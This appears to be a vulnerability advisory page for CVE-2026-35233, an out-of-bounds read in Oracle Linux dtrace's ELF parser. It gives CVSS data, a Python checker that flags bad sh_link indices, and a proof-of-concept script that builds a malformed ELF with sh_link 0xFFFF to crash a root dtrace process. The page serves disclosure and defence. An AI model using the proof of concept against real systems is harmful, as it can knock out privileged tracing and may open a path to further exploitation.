Security Vulnerability Report
CVE-2026-35233 CVSS 4.4 MEDIUM

CVE-2026-35233

Published: 2026-05-01 18:16:15
Last Modified: 2026-05-05 17:46:31

Description

An unprivileged attacker can craft a user-space process with a malicious ELF binary containing an out-of-range sh_link field. When root-level dtrace attaches to -- or instruments -- that process (via dtrace -p , pid probes, or USDT), the ELF parser reads heap memory beyond the allocated section cache array without any bounds check. This results in an uninitialized/out-of-bounds heap read that can cause a NULL pointer dereference crash of the dtrace process (DoS), or -- depending on heap layout -- a read-then-use of a garbage pointer controlled by adjacent allocations, providing a foothold toward further exploitation in a privileged context.
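The missing check the description points at is a plain index comparison: before a section header's sh_link is used to look up an entry in a section cache of e_shnum entries, it must be verified to be below e_shnum. The checker below is an added example (not code from the advisory, from NVD or from dtrace itself) that parses an ELF64 section header table and reports every out-of-range sh_link, generalising the single-section case to any number of sections; build_elf64 is a hypothetical helper that constructs the sample images inline.

```python
import struct

# Added example: the bounds check the description says the parser lacks.
# Every sh_link must index a section header, i.e. be < e_shnum, before it
# is used to look up anything in a section cache of e_shnum entries.
ELF64_EHDR = '<16sHHIQQQIHHHHHH'  # 64-byte ELF64 file header
ELF64_SHDR = '<IIQQQQIIQQ'        # 64-byte ELF64 section header

def check_sh_link(data):
    """Return [(section_index, sh_link), ...] for every section header whose
    sh_link is not a valid section index. Raise ValueError if the image is
    not a parsable little-endian ELF64 or its table runs past end of file."""
    if len(data) < 64 or data[:4] != b'\x7fELF' or data[4] != 2 or data[5] != 1:
        raise ValueError("not a little-endian ELF64 image")
    ehdr = struct.unpack_from(ELF64_EHDR, data, 0)
    e_shoff, e_shentsize, e_shnum = ehdr[6], ehdr[11], ehdr[12]
    if e_shnum and e_shentsize != 64:
        raise ValueError(f"unexpected e_shentsize {e_shentsize}")
    if e_shoff + e_shnum * e_shentsize > len(data):
        raise ValueError("section header table runs past end of file")
    bad = []
    for idx in range(e_shnum):
        shdr = struct.unpack_from(ELF64_SHDR, data, e_shoff + idx * e_shentsize)
        sh_link = shdr[6]
        if sh_link >= e_shnum:   # would index past a cache of e_shnum entries
            bad.append((idx, sh_link))
    return bad

def build_elf64(sh_links):
    """Constructed sample (hypothetical helper): ELF64 header followed by one
    section header per entry of sh_links, all other fields minimal."""
    e_ident = b'\x7fELF\x02\x01\x01' + b'\x00' * 9   # exactly 16 bytes
    ehdr = struct.pack(ELF64_EHDR, e_ident, 2, 62, 1, 0x400000, 0, 64, 0,
                       64, 56, 0, 64, len(sh_links), 0)
    shdrs = b''.join(struct.pack(ELF64_SHDR, 0, 1, 0, 0, 0, 0, link, 0, 0, 0)
                     for link in sh_links)
    return ehdr + shdrs

if __name__ == "__main__":
    # Sections 0 and 1 link to section 0 (valid); section 2 links to 0xFFFF.
    print(check_sh_link(build_elf64([0, 0, 0xFFFF])))
```

Running it against a real binary is the same call on the file's bytes; an empty list means every sh_link is a valid index.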

CVSS Details

CVSS Score
4.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L
Weakness
CWE-125 (Out-of-bounds Read)

Configurations (Affected Products)

cpe:2.3:o:oracle:linux:8:-:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:oracle:linux:9:0:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:oracle:linux:10:0:*:*:*:*:*:* - VULNERABLE
Oracle Linux (see the official security advisory for the specific affected versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import struct

# Create a minimal malicious ELF to trigger the sh_link out-of-bounds read
# This is a conceptual PoC generator.

def create_malicious_elf(filename):
    # ELF Header (64-bit); e_ident is exactly 16 bytes (EI_NIDENT)
    e_ident = b'\x7fELF\x02\x01\x01\x00' + b'\x00' * 8
    e_type = struct.pack('<H', 2)        # ET_EXEC
    e_machine = struct.pack('<H', 62)    # x86-64
    e_version = struct.pack('<I', 1)
    e_entry = struct.pack('<Q', 0x400000)
    e_phoff = struct.pack('<Q', 64)
    e_shoff = struct.pack('<Q', 64)      # Section header offset
    e_flags = struct.pack('<I', 0)
    e_ehsize = struct.pack('<H', 64)
    e_phentsize = struct.pack('<H', 56)
    e_phnum = struct.pack('<H', 0)
    e_shentsize = struct.pack('<H', 64)
    e_shnum = struct.pack('<H', 1)       # Only 1 section header
    e_shstrndx = struct.pack('<H', 0)
    elf_header = e_ident + e_type + e_machine + e_version + e_entry + e_phoff + \
        e_shoff + e_flags + e_ehsize + e_phentsize + e_phnum + \
        e_shentsize + e_shnum + e_shstrndx

    # Section Header (corrupt sh_link)
    # sh_link is set to a large value (e.g., 0xFFFF) to cause out-of-bounds read
    sh_name = struct.pack('<I', 0)
    sh_type = struct.pack('<I', 1)       # SHT_PROGBITS
    sh_flags = struct.pack('<Q', 0)
    sh_addr = struct.pack('<Q', 0)
    sh_offset = struct.pack('<Q', 0)
    sh_size = struct.pack('<Q', 0)
    sh_link = struct.pack('<I', 0xFFFF)  # MALICIOUS: Out of range index
    sh_info = struct.pack('<I', 0)
    sh_addralign = struct.pack('<Q', 0)
    sh_entsize = struct.pack('<Q', 0)
    section_header = sh_name + sh_type + sh_flags + sh_addr + sh_offset + \
        sh_size + sh_link + sh_info + sh_addralign + sh_entsize

    with open(filename, 'wb') as f:
        f.write(elf_header)
        f.write(section_header)
    print(f"Malicious ELF '{filename}' created. Run it and attach dtrace as root to trigger.")

if __name__ == "__main__":
    create_malicious_elf("malicious_elf")
```

References

https://linux.oracle.com/cve/CVE-2026-35233.html (Vendor Advisory)